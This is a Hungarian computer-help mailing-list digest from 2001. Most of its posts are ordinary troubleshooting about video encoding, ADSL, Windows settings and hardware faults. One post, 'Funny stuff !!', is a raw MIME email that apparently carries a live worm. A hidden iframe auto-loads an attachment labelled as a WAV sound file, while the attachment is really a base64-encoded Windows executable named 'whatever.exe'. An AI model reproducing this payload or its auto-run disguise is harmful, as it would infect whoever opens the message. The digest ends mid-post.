+ - Re[2]: HW Video encoder valaszok (mind) VÁLASZ  Feladó: (cikkei)

>> Azert ennel majd gondolj bele, hogy az MPEG-2 fajlmerete megfelelo-e 
>> nem tul nagy-e... Szerintem az MPEG-1 boven eleg.
>Valaki vilagositson mar fel, ha tevedek. En ugy tudom, hogy ha ket
>filmet azonos minosegben digitalizalnak be, akkor ezek kozul az MPEG-2
>lesz rovidebb (emiatt is kell nagyobb szamitasi teljesitmeny

Szerintem itt a hardveres megoldasok kozott lehet kulonbseg. IMHO az
MPEG1-es kartya max 352x288-as filmet gyart, az MPEG2-es pedig ennel nagyobb
felbontast is tud. Persze itt a minoseg lenne az elsodleges szempont, igy
term. nagyobb lesz az MPEG2-es file.

>ugyanaz a film DiVX-ben rovidebb, mint mpg-ben, es tudtommal a DiVX
>az MPEG-2-vel mutat szorosabb rokonsagot.

Passz. A DivX-et elvileg MPEG4-nek hivjak. Igy nyilvan kozelebb all az
MPEG2-hoz, mint az MPEG1-hez.

>Ha jol tudom, a DVD-n csak az extra dolgok (felirat, kameraallasok, stb.)
>miatt foglalnak el nagyobb helyet a filmek.

Nem hinnem. A feliratok KB-ban merhetok, kameraallasbol meg eleg keves van.
Egy DVD-rol rippelt atlagosan hosszi film [A+V] 4-5GB korul mozog [csak a
film]. Ebbol az audio savok nehany szaz MB-ja elhanyagolhato, a fennmarado
tobb giga pedig 1024x768-as felbontasu MPEG2 kodolasu video stream.
Ebbol keszul a ~800x600-as [ennel legtobbszor kisebb] DivX movie.

Udv,
		/-/unter			-[HE 1.15beta7;]-
+ - Re[2]: ADSL stb (mind) VÁLASZ  Feladó: (cikkei)

HIX GURU #2480, :
>ismeros szerint ha a szolgaltatotol kapott halokartya helyett mas halo-
>kartyaval probalkozik, nem sikerul csatlakoznia (kartyafuggo szolgaltatas)
>Gondolom, hogy az ilyen, szolgaltato altal adott kartya is biztosit(hat)ja
>a szolgaltato szamara a terheles korlatozasat (valamilyen kartyabeli
>serial number lehet a kiszures alapja, 

Ez nem lenne tul esszeru. A telefonszolgaltato is meg tudja kulonboztetni a
vonalamat a szomszedetol.
TFH. hogy ket teljesen koser ugyfel kartyat cserel. Akkor egymasnak
szamlaznak? 
Talan az lehet, hogy a kartya-azonositot hozzarendelik az elofizetoi hurok
azonositojahoz, es ha nem stimmel, akkor nem enged be. Ez nekem felesleges
bonyolitasnak tunik, de attol meg lehet alapja.

Udv,
		/-/unter			-[HE 1.15beta7;]-
+ - Re: Explorer =?UNKNOWN?Q?megnyit=E1sa?= nagy ablakban? (mind) VÁLASZ  Feladó: (cikkei)

HIX GURU #2480, :
>Tudja-e valaki, hogy hogyan es hol kell beallitani azt, hogy linkekre
>kattintva, az uj Internet Explorer ablakok teljes meretben nyiljanak meg,
es
>nem 10x10-es, meg mindenfele kis meretben?

IMHO nem lehet.
Nyisd meg az Explorert, tedd kozepes meretbe, egerrel huzd ki a kepernyo
szeleig, majd zard be. Igy jo esetben kimenti, hogy ezt szeretned. Ezutan
inditsd ugy ahogy szoktad [teljes meret]. Az uj ablaknak most az egerrel
kihuzott meretben kell megnyilnia. Ezutan eleg fel mp, hogy a kepernyo
tetejere rantsd az egeret, majd jobbklikk a cimsoron.
Ennel jobbat nem tudok.

Udv,
		/-/unter			-[HE 1.15beta7;]-
+ - Re: #2451 low disk space (mind) VÁLASZ  Feladó: (cikkei)

HIX GURU #2481, :
>>> Utolso kerdes: registryben le lehet tiltani a you are running out of
>>>disk space figyelmeztetest? (win98)
>>Ha a 40MB-os riasztast akarod kikapcsolni, azt megteheted itt:
>>Mycomputer / drive jobbklikk / tulajdonsagok / karbantartas /
>Na ilyen nekem nincsen, a properties-bol csak general es tools nyilik,
>egyikben sincs. KB. 25 Meganal szol. ez a vinyo egytizede :)

Akkor ez a lomtar lesz. Annak az alapbeallitasa 10%.
Jobbklikk a Recycle Bin ikonon, Properties, es allitsd be, hogy a torolt
file-ok azonnal semmisuljenek meg.


Udv,
		/-/unter			-[HE 1.15beta7;]-
+ - Jajj, az egerem! (mind) VÁLASZ  Feladó: (cikkei)

Ugy latszik, most minden tonkremegy... :[
Tegnap azt jatszotta az egerem [gorgos ms intellimouse ps2], hogy csak
fuggoleges iranyban volt hajlando mozgati a kurzort. Egy gep kikapcs-bekapcs
utan megint jo. Azert idegesit a dolog, mert mar lattam egy ugyanilyen
egeret, aminek ez volt a hibaja, es a szerelok szerint javithatatlan volt.
Mitol lehet?
EIK!

Udv,
		/-/unter			-[HE 1.15beta7;]-
"¦Nem „Ô¤tudom, mie°Crt sÔzidja mi‡Cndżenki a MATAEVot.UCÎuć"
+ - Jaj, a monitorom! (mind) VÁLASZ  Feladó: (cikkei)

Sziasztok!

Par napja a monitorom ugy kezdi a reggeli muszakot, mintha valami
magnestenger kozepen toltotte volna az ejszakat. Reggel bekapcsolom, es a
szep kek kepernyom nehol lila, nehol zoldes-sargas szinekben pompazik.
Egy Belinea 10 60 20 [19"] monitorrrol van szo, kb. 1 eves.
Kezd megijeszteni a dolog, mert nem tudom reprodukalni, de atombiztosan
minden reggel igy fogad. Meg van vagy 1 ev garancia, de nem szeretnem
megvarni, amig az se lesz...
A gep naponta kb 2x van bekapcsolva, valahogy igy: 8:00-11:00 es 
18:00-2:00. A hiba csak reggel jon elo, delutan nem. [???] A monitor
kozeleben nincs hangfal, sem egyeb magnes, csak a nagytorony van
melleallitva. Pliiiiz adjatok otleteket, en nem ertem a dolgot...
EIK!

Udv,
		/-/unter			-[HE 1.15beta7;]-
"Ha a recsegesek lathatok is, akkor az televizio."
+ - Re: HW Video Encoder valaszok (mind) VÁLASZ  Feladó: (cikkei)

Hello!

N. Gyorgy irta a *** HIX GURU *** #2480-ban:
> Ha jol tudom, a DVD-n csak az extra dolgok (felirat, kameraallasok, stb.)
> miatt foglalnak el nagyobb helyet a filmek.

Meg az 5.1/6.1/7.1 DTS hang, ha jol tudom.

Udv: Lecso
mailto:
+ - Re: Kerdes (mind) VÁLASZ  Feladó: (cikkei)

Hello!

 irta a *** HIX GURU *** #2480-ban:

> Azt szeretnem megkerdezni, hogy az Abit BM6 alaplap-ba belelehet-e rakni mond
ju
> k egy Celeron 733 procit
> attol fugetlenul hogy a BIOS-ba csak 600-ig lehet beallitani.

Nekem is ugyan ilyen alaplapom van es biztosan allitom, hogy csak ugy
siman nem! Nemi forrasztgatas szukseges az alaplap hatuljan es utana
mukodik. Ez azert van mert a pl. 466-os processzorom PPGA tokozasu, a
Cel700-as pedig mar FCPGA. Van leirasom a dologhoz, ha kell szivesen
elkuldom. Ez amugy barmilyen alaplaphoz jo _elvileg_. Termeszetesen
felelosseget nem vallalok erte.

Udv: Lecso
mailto:
+ - Funny stuff !! (mind) VÁLASZ  Feladó: (cikkei)

This is a multi-part message in MIME format.

--bound
Content-Type: text/html;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY><iframe src=3Dcid:SOMECID height=3D0 width=3D0></ifram
e>
<font>peace</font></BODY></HTML>

--bound
Content-Type: audio/x-wav;
        name="whatever.exe"
Content-Transfer-Encoding: base64
Content-ID: <SOMECID>

TVoAAAIAAAACAB4AHgAAAAACAAAAAAAAAAAAAMWnLuEOH7oOALQJ
zSG4/0zNIVdpbjMyIG9ubHkhDQokQAAAAFBFAABMAQQAwipthgAA
AAAAAAAA4ACOgQsBAhkACgAAAAQAAAAAAAAAEAAAABAAAAAgAAAA
AEAAABAAAAACAAABAAAAAAAAAAMACgAAAAAAAFAAAAACAADI8AAA
AgAAAAAAEAAAIAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAADAA
AHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAFAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Q09ERQAAAAAAEAAAABAAAAAKAAAAAgAAAAAAAAAAAAAAAAAAIAAA
YERBVEEAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAA
AMAuaWRhdGEAAAAQAAAAMAAAAAIAAAAMAAAAAAAAAAAAAAAAAABA
AADALnJlbG9jAAAAEAAAAEAAAAACAAAADgAAAAAAAAAAAAAAAAAA
QAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAD8voYQQABWuAAgQABQl7KAu3AQQACk/9Nz+zPJ/9NzFDPA
/9NzHUGwEP/TEsBz+nU1quvi6EMAAABJ4hDoOQAAAOshrNHodD0T
yesVkUjB4Ais6CMAAACA/AVzBoP4f3cCQUGVi8VWi/cr8POkXuum
AtJ1BYoWRhLSwzPJQf/TE8n/03L4w+hwAsAC6/4z0mQ5/zKPiSK+
JyxAA7+6GAvoCTNLRTlSTo5MMzIB/xU0MACT6FNvCCrgwKyR4wUA
VgPx6+mD7FRzgXoYzyiLJugqYQBTb2Z0d2FyZQ5cTWlj3xtzHdBX
QUKhBDSACmFiIEZpbHVleU51beBqxMJ4BwCNdRSBxKBBC8D0VMyL
sClyeUsATmTjRgN2YFHyxhyAfgEAdRJWjX0MAFdqSFlmrariAPtY
XoPGIFXoZgdtXRQCJFni2P91jqFsBAYIoae+Vbs4BoMDxFRkZ48G
GVZYaiXCEzoAAml3b3JtLmF4bDh6Zfc9Ynl8obMwxG4h/msceDJv
WTFDDcR3aKSrHXR5cM1uZw6bGnMK+3j/r98o3ao4lhQxZ28IYWTH
3z/+X253lkZ5HDJ2DR5zQAJpcHN03im8b1DOLO5io2NhdeU2Oihx
bNRSiJ7dY191G2Q99rTYLX0NaNTumGzZPm7PkHI1jDlj7KtUbOvp
bY14J1tm3XC500lKM12WdPff2/0gTGff6MprDVezomZtDqr4TWFT
kWEUTiEnpm+kcGouxxBrj2Fb1v+e6iwYNxyReQ1i56JjpdNtAop2
aXKKsbhaQs6c9c5md9TBKCxe1SW5blqtbs5BgQ1mSUf9cPtQE7Qn
3mGkH0o8SppFO0X9bmM3mv1yJTVV9B2pdYsNxQ0j33+QoR9uVblB
/3ojMi6oAoaYWcPebG92elOggnIqajLFhDxRJ+V1V+jNEjGom3xt
hMJkk1TvcjRrhpZ4Nklmy1fkGXZiwGv+jo5yI5FwSCb5VzlhRDop
DUKleK+wONx1beeoavqQMBsyOWFUVT+LIQUyI2ZQZ96jhOVdKLxp
hIkNij4ZGCx8LTL17zQZcmSHct7bbNtttqBmJkx3Y9JuFqAKA3m8
Ks5CDWPIcmfrbSo0c8+hmWE1KM82Gmuolvx6b28S/7rMemwiLmJi
YTh0aqQ3KNN8Z+5o1SDUbxZfJIxKtgVWi/CKhw5VaAE6EGHq+hNq
fQToAsgY/p+XWxkS4i0AZsdFBPGdDImCBmjdKMnnDBBTTVQ6UCDQ
hnbZBiLhvZE/PWRcBlYDl3Qyi7sMnrThg2QIahCNGXpQVzYKDHUN
F7sbKYf+LCsOiyIMGrPTAl7Dh97oLDwIGHcLCo71/xwkhXXwOE7o
bkAC6xnmASUYIJEJUiJdRMqVzEHJEWA3aAgKCxGxxhNQipeEC8pA
ljPJtQIO86SBxg0OQOkKUgoWKhRFDCAKWI2Q7BHHFlK5xhAMM+hc
3cfQPQ0KoJCLfAkkBOjwGR/OEGHpXvOzArZohVSt2SEUERJcZXJj
ORwPhNY9EsNWU2InExRYReJIe3ZMQUMgcuOYMLO/i/N4W2GZr17p
DZtnVh73Og4C6/BgV+G4FANkuuiuihtmyizJCE26AiJ5kZ8x+AkE
SI/SiAP4Ck+wIKotEQk4SJw6bXnqxCZx1hi4JiAtZR2rtggo7F4Y
X+gf2WHrA5LDYL4RJlVAciJ2Ch90KBuHkQvJpwf5AIF1++L13Cw+
BgOq6/jRoQv7/mBz907+0f/D/pFw14QwtgUPRnc6oAQgUmdlEAsF
Q4LKbEK344PtF5UcFyyeJQG+RnVucX7CYtZh6mQhL5AYa1kUM2E6
SdzUzNTR15oJSwqDCi5IYv9OFQU1cIoT0Q/2bLQKPHTtVTCcDmZx
WHAzrheVtxT8VGPhroBHOC4HOa74Ln0cay5URXnGFi7tBtza5jPj
LDeeaNkFLSckbXnABiHjww4EOi0pDz9aPemGO7gZEx9WAjdJrEFo
ifpeSFFOc/8k6RaIWQM+8cOJUovIGHEz0n739sIMWlnDUyeFIBQD
ALltTsZB9+GRxFreLACL2A8xM33DxCAFOZJ5iawiXFsGwzP26EB/
AEFCQ0RFRkdIAElKS0xNTk9Qw4pTVFUL0lhZWgX0Y8E7ZmdA3Wpr
bFht1ApwcXL0gHZ3eHl6MAAxMjM0NTY3OAc5Ky9fVbDtD7YYAcDr
AoDjP4ogvojmMgNGZosYht+owesEcLelFRVAFo8GiP94M9vUfRCw
RYP9/nZrC6gH7wTph/xGFqgiJukDCwN1m4vOuNZdw5jvsFcE/3Qk
DGjSIoCE4e5WQNAxan9UjRNdFFMmdD1OGEZYFfI5FVk96uQZdOBJ
DVIV9iH4wgjB+bUJ9oMkgB4/agM2EhEywFZA4i5BdCZIibbQKqB1
BMbcFeYp3iDhGQIf6gwIDpb4w/lDi0M8mFQYeBcD061DcSZWkeyH
8Mfzzx0Fw1CWzF47A8FYXnXvUvXRljgwAlpg+OvVf8MEuo4kO5zQ
23QUMgDQsAjR6nMGgQDymvOnwf7IdfDrCeeSWsPlj8mboqSgjkFO
YxoXGsKPY6eTZykmXBCec1QwAY4xBwEyEEhFTE+WdQ5jYYxofnSQ
SMAmNU1BSUwPIEZSTxYKHwIRvY9DUFR8mU8eAwxEfkHlnhMzWUbk
bVMkVMVBHFN1YmowqXTIGAUWRB4s8hIEA01JkEUtVsn+c+MoDCIx
LjAmQ/VWowYMLVR5cEltlkkeaWjE6i/13HhlMmQ7QCCZAWJiC2Ey
eT0iVwpqGlBYLTZQcqAGMnR5gDOcF1xNwl29Uh7NThBgp2ynI7VD
Go80RTK9HU91JAI92GELRXhwk/PBNS7JMM5it0MdxYcQn1Q88mng
G09MbEV6wm8TZHVjwZNCeUtJUx94V1ZCklMj1hwHVmHwKS3xNhbd
8GeeCUkTJ8JmkK10LqEwLcaa9EUtScgOL2j8bUhsJ/XGHpi4LUh0
JmG+by04xDU56jH3Szgkcv8Ic2Y8vkXAZLq3x4pxdZ027oaDchzw
YZ4FKHADPEhUTUw+CAxFQUQULweHQk/GWQw1aWaEF6kdj4NjPTNE
p+FkOlMwGkU9Q0nPFm+Dj3QnKzCHYmSf9ApqeTBPO6fNXoMotv0h
KKosDNQOU5+qba3n4mF1gapvL3j6Ydt2T+lbVA3mLXcO0POCyC54
+a/oxWKgcDZSNCOUtGUoPHW+Sn4GgVtpDhYgeFFVSVTADAeinOKR
AKflW54fEm/vAS6v5m7wO0lhdPF+3NIKdvQ4I8OAJqR3fKlIoAA0
8nYaLD1JgAPhKdjOKF+GA0gJNjlWl1BJwE6x3LABxkeH5wPHVf3F
QRoIV4zwQ0szH+DpAPZfJ/jiFr/ZAItrJEnIL10lHp9YfMX/U+OA
7Dx74AWAFkxGpxwxMAD/JTQwQAD/JTgwQAAAAAAAKDAAALPCHzcA
APe/QDAAADQwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE4wAABeMAAA
AAAAANB297+obfe/AAAAAEtFUk5FTDMyLmRsbAAAAABMb2FkTGli
cmFyeUEAAAAAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA=

--bound--
+ - LG 52x lassitasa (mind) VÁLASZ  Feladó: (cikkei)

Hello Guruk !

Egy ismerosom vett egy 52x-es LG CD olvasot, es hallotta tolem, hogy az en 
32x-es olvasom azert birta ki mar vagy 3 eve, mert lassitom, es kert tolem 
lassitoprogikat. En elvittem vagy harmat is, de nem detektalt nala csak 
52x-es sebesseget, es nem lehetett lejjebb vinni a sebesseget. Kb 30 sec 
utan az olvaso (ha mar nem olvas) egy alacsonyabb fordulatra valt, az mar 
nem zajos, es nem is karos, gondolom, de ha MP3-at hallgat a srac CD-rol, 
vagy olyan jatekkal nyomul, ami idonkent megnezi a CD-t, akkor bizony porog, 
mint a veszedelem. Mar legalabb 6-8 fele CD-t sikerult lelassitanom 
kulonbozo ismerosnel, rokonnal, de ilyennel meg nem talalkoztam, hogy egyik 
lassito programom se mukodne.
Mik a tapasztalatok az LG olvasokkal ? Lehet egyaltalan ezeket lassitani, 
vagy hadd porogjenek, es 11.5 honap utan vissza kell vinni, hogy 
garancialisan csereljek ki. De nem csak az olvasot felti a srac, hanem a CD 
korongjait is.

Barmilyen tapasztalatra kivancsi lennek.

Udv, Gabor

_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
+ - levelelleklet (mind) VÁLASZ  Feladó: (cikkei)

Sziasztok guruk!
Van egy kis gondom.
Outlook Express 6 hasznalok. A minap kaptam valakitol egy levelet,
meg egy zippelt mellekletet.
Szepen letoltom a levelet, es amikor megnyitom, ezt olvasom :
Az Outlook Express eltavolitotta a nem biztonsagos mellekletet.
Azt hittem eldobom az agyam. Majd en eldontom, hogy mit akarok eltavolitani.
Volt valakinek hasonló elmenye?
Hol kell allitani, hogy ne csinaljon ilyet tobbet?

Elore is kosz a segitseget!

Üdv:GJ
+ - Re: levelezo (mind) VÁLASZ  Feladó: (cikkei)

On Sun, Nov 25, 2001 at 05:43:17PM +0000,  wrote:
>  >> Azt szeretnem kerdezni, hogy milyen levelezoprogramot ajanlotok arra
>  >>a feladatra, hogy egy bazi nagy levelet ne kelljen letoltenem, hanem
>  >> torolhessem a levelkiszolgalom szervererol. Outlook-ban nem
>  >> talaltam ra lehetoseget, vagy van?
>  >telnet?
> Hali!
> 
> Ez elegge ketseges. Nalam az atlag user alapertelmezett shell-je a
> /dev/null azonkivul a sima telnet eleg sok biztonsagi problemat vet fel.
> Ha van shell akkor mar inkabb ssh /mar persze ha van.../.

telnet hostnev 110 megy akkor is, ha nincs shell, de van POP

-- 
--- Friczy ---
'Death is not a bug, it's a feature'
+ - [TELEFON] Re: IntraCom NetMod (mind) VÁLASZ  Feladó: (cikkei)

On Tue, Nov 27, 2001 at 11:13:26AM +0000,  wrote:
> Probalta mar valaki a fent emlegetett borzalmat linux alatt hasznalni?
> Standard modembeallitasokkal ugyanis nem nagyon megy, mikozben a gepre
> akasztott modem tokeletes (csak lassu...). Akinek van vmi konfigja,
> pppd scriptje, initstringje, az ne kimeljen. (ps.: maganba _IS_
> valaszoljatok, mert nem szoktam a guru-t olvasni...)

Nekem mindossze annyi kellett, hogy a tarcsazo stringben az atdtxxxxx et
kiegeszitettem atb0dtxxxxxx-re

-- 
--- Friczy ---
'Death is not a bug, it's a feature'
+ - Re: S-VIDEO kerdes (mind) VÁLASZ  Feladó: (cikkei)

On Tue, Nov 27, 2001 at 12:23:17PM +0000,  wrote:
> az a kerdesem, hogy az S-video az hordoz hang informaciot is, vagy
> csak kepit? a masik, hogy max. milyen hosszu lehet egy s-video kabel?
> homer

Csak kep

-- 
--- Friczy ---
'Death is not a bug, it's a feature'
+ - [WINDOWS] Hatha valaki nem ismeri :-) (mind) VÁLASZ  Feladó: (cikkei)

A Windows hibaüzenetei:

    WinErr: 001 A Windows betöltődött - a rendszer veszélyben

    WinErr: 002 nincs hiba - egyenlőre...

    WinErr: 003 téves hibaüzenet - biztosan félremenet

    WinErr: 004 multitaszk kísérlet - a rendszer összezavarodott

    WinErr: 005 rosszindulatú hiba - Desqview a winchesteren

    WinErr: 006 költségvetési hiba - elégtelen hardverre költött pénz

    WinErr: 007 borzasztó zűr van - az isten se tudja, mi történt

    WinErr: 008 irodalmi túlcsordulás - tele a postaláda

    WinErr: 009 kevés hely - szabadíts fel legalább 50 megabájtot

    WinErr: 00A memóriahiba - Kell még Ram. Még! Még! Még!

    WinErr: 00B megmagyarázhatatlan hiba - kérjük magyarázd el, hogy történt

    WinErr: 00C a fejlesztők által lefoglalva későbbi hibaüzenet számára

    WinErr: 00D a billentyű lezáródott - próbálj ki mindent, ami eszedbe jut

    WinErr: 00E a rendszer visszaállíthatatlan, megsemmisült - vegyél újat

    WinErr: 00F felhasználó hiba - nem a mi hibánk, beeee!

    WinErr: 010 az operációs rendszer felülíródott, installáld újra -
borzasztóan sajnálunk

    WinErr: 013 illegális hiba - ilyen hibaüzenetet nem kaphatsz,
legközelebb megbüntetünk

    WinErr: 014 bizonytalansági hiba - a bizonytalanság mértéke nem megfelelő

    WinErr: 018 rendszeromlás - nem értjük a saját kódunk

    WinErr: 019 időzítési hiba - kérlek várj - várj és várj és várj

    WinErr: 01A hiba a hibajegyzékben

    WinErr: 01B vírus hiba - egy vírus aktivizálódott egy dos ablakban, de
a működéséhez Windows szükséges - minden ablak automatikusan becsukódik,
hogy a vírus újra aktivizálható legyen

    WinErr: 01C egér-meghajtó hiba - az egér meghajtó nincs installálva
-folytatáshoz nyomj bal egérgombot

    WinErr: 01D buffer túlcsordulás - túl sok hiba lépett fel, de ezeket
nem részletezem

    WinErr: 01E ezzel kilépsz a Windowsból - akarsz másik játékot?

    WinErr: 020 lejárt az idő - az üzemeltető elaludt Bootolás közben

    WinErr: 042 működési hiba - az elmúlt tíz percben nem volt
rendszerösszeomlás

    WinErr: 103 kritikus hiba - egy pillanat, ez most mi?

    WinErr: 678 memória hiba - hogyan? mit is mondtál?

    WinErr: 683 a: meghajtó hiba - ámbátor a lemezed jól van (most
formatáltam), már nem kedvelem

    WinErr: 902 winchester hiba - a merevlemezen a fájlok rendezettek,
optimizáltak voltak, ezért össze kellett őket keverni és párszáz .TMP fájlt
szétszórni

    WinErr: 999 feketeposta hiba - utalj 500$-t Gatesnek, vagy a gépednek
annyi!


_______________________________
     San Francisco and Vicinity 
    Hungarian Community Webpage
http://home.pacbell.net/a_rekay
underscore between a and r: a_r
+ - RE: levelezo (mind) VÁLASZ  Feladó: (cikkei)

On 27-Nov-2001 Stanicz Ferenc wrote:
> A GURU 2479-ban irta :
>  >
>  >On 24-Nov-2001  wrote:
>  >> Azt szeretnem kerdezni, hogy milyen levelezoprogramot ajanlotok arra
>  >>a feladatra, hogy egy bazi nagy levelet ne kelljen letoltenem, hanem
>  >> torolhessem a levelkiszolgalom szervererol. Outlook-ban nem
>  >> talaltam ra lehetoseget, vagy van?
>  >telnet?
> Hali!
> 
> Ez elegge ketseges. Nalam az atlag user alapertelmezett shell-je a
> /dev/null azonkivul a sima telnet eleg sok biztonsagi problemat vet fel.
> Ha van shell akkor mar inkabb ssh /mar persze ha van.../.

Hmm. Felreertettel. Igy gondoltam:

telnet ip.cim 110
....
user neved
pass jelszavad


igy belepve olvashatod, listazhatod es torolheted a leveleket.

Nem szerverrol beszeltem. :)

Zoli
+ - Re: SMS Kapcsoltam - segitseg! (mind) VÁLASZ  Feladó: (cikkei)

A GURU 2480-ban irta :
>  A multkor jelentkeztem - vesztemre - az SMS kapcsoltam c. jatekba a
>mobilomon, azt irtak, hogy a STOP uzenet elkuldesevel abba lehet hagyni
>a jatekot. Azonban nekem azota is naponta kuldik a hulye kerdeseket es
>sehol sem talalom, hogy hogyan lehet toluk kijelentkezni!!!! Ha valaki
>tudja, kerem, irja meg, mert mar kezd az oruletbe kergetni a sok
>keretlen SMS...
Ha jol olvastam, akkor ennek van egy mobilszama is, nem? Meg nem mondom mi az,
annyira nem figyeltem, de naponta van a TVben. Elolvastam a jatekleirasat a
teletext-en, ez is csak egy ujabb penzkicsalas... Csak 1 nyertes van, aki a
legrovidebben valaszol (vagy legtobb pontot gyujt). Azaz ha dolgozol is neha,
semmi eselyed, csak szorod a penzed...

Minden jot, Vili   www.macasoft.hu  HIXEditor 1.15beta7
Kuldes: GURU/Maganba
+ - Re: cool desk crack (mind) VÁLASZ  Feladó: (cikkei)

A GURU 2480-ban irta :
>tudom nem egy etikus dolog itt kerdezoskodni crack-ek utan, de vegigneztem
>az osszes crack oldalt es nem akadtam ra a fenti progi 3.82-es verziojanak
>kulcsara. Most vagy nem letezik hozza , vagy en nem voltam elegge vizsla.
>Segit valaki?
Tudom, nem erre iranyult a kerdes, de azert leirom: en vagyok a program magyar
terjesztoje, 6000 Ft + AFA az ara nalam, szamla is megy rola termeszetesen
(meg az AFAt is visszakaphatod, hiszen kulfoldi vagy.) Bovebbet a lenti lapon
talalsz.

(Nem akarom eroszakosan terjeszteni,  csak gondoltam, felajanlom, mint
lehetoseget.)

Minden jot, Vili   www.macasoft.hu  HIXEditor 1.15beta7
Kuldes: GURU/Maganba
+ - Re: pdf to doc (mind) VÁLASZ  Feladó: (cikkei)

A GURU 2480-ban irta :
>Keresnek olyan programot, ami kepes a PDF-et docba konvertalni. Bar
>ott van az Adobe Reader (az otos verziot probaltam), tudom, de az nem igazan
mu
>kodik jol, olyan
>szovegeket, ahol egy oldalon tobb hasab van, rosszul alakitja at,
>eloszor a jobb oldali hasabot veszi, es csak utana a balt, vagyis pont
>forditva olvassa be az oldalakat.
>Erre keresnek megoldast, egy olyan program szemelyeben, ami ezt jol
>vegzi! Ha mondtok barmilyen pdf converter nevet, az is jo, en majd
>kiprobalom.
Ket lehetoseg: GhostScript/GhostView paros, a masik elkuldeni az Adobe lapjan
talalhato cimre, talan , a subjectben meg kell adni a PDF
letoltesi helyet (azaz weben kell lennie), s elkuldik attchban a DOC-ot.

Minden jot, Vili   www.macasoft.hu  HIXEditor 1.15beta7
Kuldes: GURU/Maganba
+ - Re[2]: HW Video encoder valaszok (mind) VÁLASZ  Feladó: (cikkei)

A GURU 2480-ban irta :
>On Sun, Nov 25, 2001 at 01:23:16AM +0000,  wrote:
>> >3. Snazzi/Dazzle Video Creator II
>> >75 eFt + sarc. A leiras szerint szuper, gyakorlati
>> >tapasztalatot nem hallottam
>> Azert ennel majd gondolj bele, hogy az MPEG-2 fajlmerete megfelelo-e
neked..
>> nem tul nagy-e... Szerintem az MPEG-1 boven eleg.
>Valaki vilagositson mar fel, ha tevedek. En ugy tudom, hogy ha ket
>filmet azonos minosegben digitalizalnak be, akkor ezek kozul az MPEG-2
>lesz rovidebb (emiatt is kell nagyobb szamitasi teljesitmeny az MPEG-2
>lejatszashoz, mert bonyolultabb a tomoritesi algoritmus). Az teny, hogy
>ugyanaz a film DiVX-ben rovidebb, mint mpg-ben, es tudtommal a DiVX
>az MPEG-2-vel mutat szorosabb rokonsagot.
Ugy ertettem az MPEG-1 es az MPEG-2 kozti meretkulonbseget, hogy az MPEG-1 az
352x288-as meretu, az MPEG-2 meg a duplaja (negyszerese meretben)... Persze a
minoseg nem ugyanaz.

Minden jot, Vili   www.macasoft.hu  HIXEditor 1.15beta7
Kuldes: GURU/Maganba
+ - Re: Miert nem kapok guru-t? (mind) VÁLASZ  Feladó: (cikkei)

A GURU 2481-ban irta :
>Miert nem kapok guru-r?
Volt regen egy thread errol, akkor arra jutottunk, hogy csak a sze'pek kaptak,
a csunyak nem :)))
Nekem se jott :(((

Szoval biztos valami megint a szerverukkel tortent, ki kell varni,mig
megjavul.

Minden jot, Vili   www.macasoft.hu  HIXEditor 1.15beta7
Kuldes: GURU/Maganba
+ - Re: [DOS] HD Backup (mind) VÁLASZ  Feladó: (cikkei)

A GURU 2480-ban irta :
>   mondjatok nekem olyan HD Backup progikat, amik szektoronkent
>   mentenek, es van DOS-os visszatolto progijuk, es ami nagyon fontos,
